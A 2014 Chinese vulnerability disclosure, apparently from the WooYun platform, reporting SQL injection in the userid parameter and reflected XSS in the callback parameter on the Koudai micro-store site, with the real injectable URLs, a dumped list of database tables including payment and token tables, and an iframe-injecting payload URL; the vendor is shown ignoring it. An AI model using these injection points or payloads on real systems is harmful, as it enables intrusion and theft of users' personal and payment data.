漏洞详情

披露状态:

2014-05-22: 细节已通知厂商并且等待厂商处理中
2014-05-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

口袋购物微店站点存在sql注入、跨站等。

详细说明:

注入点:http://wd.koudai.com/vshop/1/H5/H5ShopInfo.php?userid=52&callback=jsonpcallback_1400737639575_8703400159720331&ver=51402

userid存在注入

QQ截图20140522162124.png





+-------------------------+

| account_statistics |

| account_type |

| active |

| address |

| address_book |

| admin_contact |

| android_info |

| black_list |

| bmb_task |

| buyer_action |

| buyer_identity |

| buyer_info |

| buyer_note |

| buyer_ua |

| cate_info |

| cate_item |

| complaint |

| csc_task |

| csc_task_process |

| custom |

| custom_detail |

| custom_group |

| custom_order |

| express_info |

| express_note |

| express_state_info |

| friend_dynamic |

| gps |

| ios_info |

| item_bg_category |

| item_info |

| item_sku |

| item_souce |

| login_info |

| market_apply |

| market_record |

| market_seller_item |

| market_user |

| offer_price |

| order_chargeback |

| order_desc_info |

| order_discount |

| order_fr |

| order_fr_info |

| order_info |

| order_pay |

| order_refund |

| order_status_history |

| order_warrant |

| pay_batch_no |

| pay_commission_batch_no |

| pay_commission_note |

| pay_detail |

| pay_history |

| pay_note |

| pay_seller_id |

| pay_task |

| pay_withdrawals_num |

| phone_valid |

| role_action |

| role_info |

| seal_off |

| sell_summary |

| shop_friend |

| sms_log |

| summary_info |

| tb_move_status |

| unpay_detail |

| unpay_list |

| unpay_order |

| update_bank_num |

| user_action |

| user_bank |

| user_device |

| user_discount |

| user_feedback |

| user_info |

| user_key |

| user_token |

| user_truename_note |

| user_union |

| user_union_msg |

| user_wallet |

| user_wallet_workflow |

| web_feedback |

| web_notice |

| white_list |

| wholesale_info |

+-------------------------+

漏洞证明:

注入点:http://wd.koudai.com/vshop/1/H5/H5ShopInfo.php?userid=52&callback=jsonpcallback_1400737639575_8703400159720331&ver=51402

userid存在注入

QQ截图20140522162124.png





+-------------------------+
| account_statistics |
| account_type |
| active |
| address |
| address_book |
| admin_contact |
| android_info |
| black_list |
| bmb_task |
| buyer_action |
| buyer_identity |
| buyer_info |
| buyer_note |
| buyer_ua |
| cate_info |
| cate_item |
| complaint |
| csc_task |
| csc_task_process |
| custom |
| custom_detail |
| custom_group |
| custom_order |
| express_info |
| express_note |
| express_state_info |
| friend_dynamic |
| gps |
| ios_info |
| item_bg_category |
| item_info |
| item_sku |
| item_souce |
| login_info |
| market_apply |
| market_record |
| market_seller_item |
| market_user |
| offer_price |
| order_chargeback |
| order_desc_info |
| order_discount |
| order_fr |
| order_fr_info |
| order_info |
| order_pay |
| order_refund |
| order_status_history |
| order_warrant |
| pay_batch_no |
| pay_commission_batch_no |
| pay_commission_note |
| pay_detail |
| pay_history |
| pay_note |
| pay_seller_id |
| pay_task |
| pay_withdrawals_num |
| phone_valid |
| role_action |
| role_info |
| seal_off |
| sell_summary |
| shop_friend |
| sms_log |
| summary_info |
| tb_move_status |
| unpay_detail |
| unpay_list |
| unpay_order |
| update_bank_num |
| user_action |
| user_bank |
| user_device |
| user_discount |
| user_feedback |
| user_info |
| user_key |
| user_token |
| user_truename_note |
| user_union |
| user_union_msg |
| user_wallet |
| user_wallet_workflow |
| web_feedback |
| web_notice |
| white_list |
| wholesale_info |
+-------------------------+





另外callback参数也没做好过滤

http://wd.koudai.com/wd/cate/getList?callback=jsonpcallback_1400737646118_061060125241056085%22%27%3E%3C%2Fiframe%3E%3CIFRAME+SRC%3D%22www.baidu.com%22%3E&ver=51402&param=123

修复方案:

做好过滤,你们懂的

版权声明:转载请注明来源 0x334@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-05-22 16:42

厂商回复:

最新状态:

暂无


漏洞评价: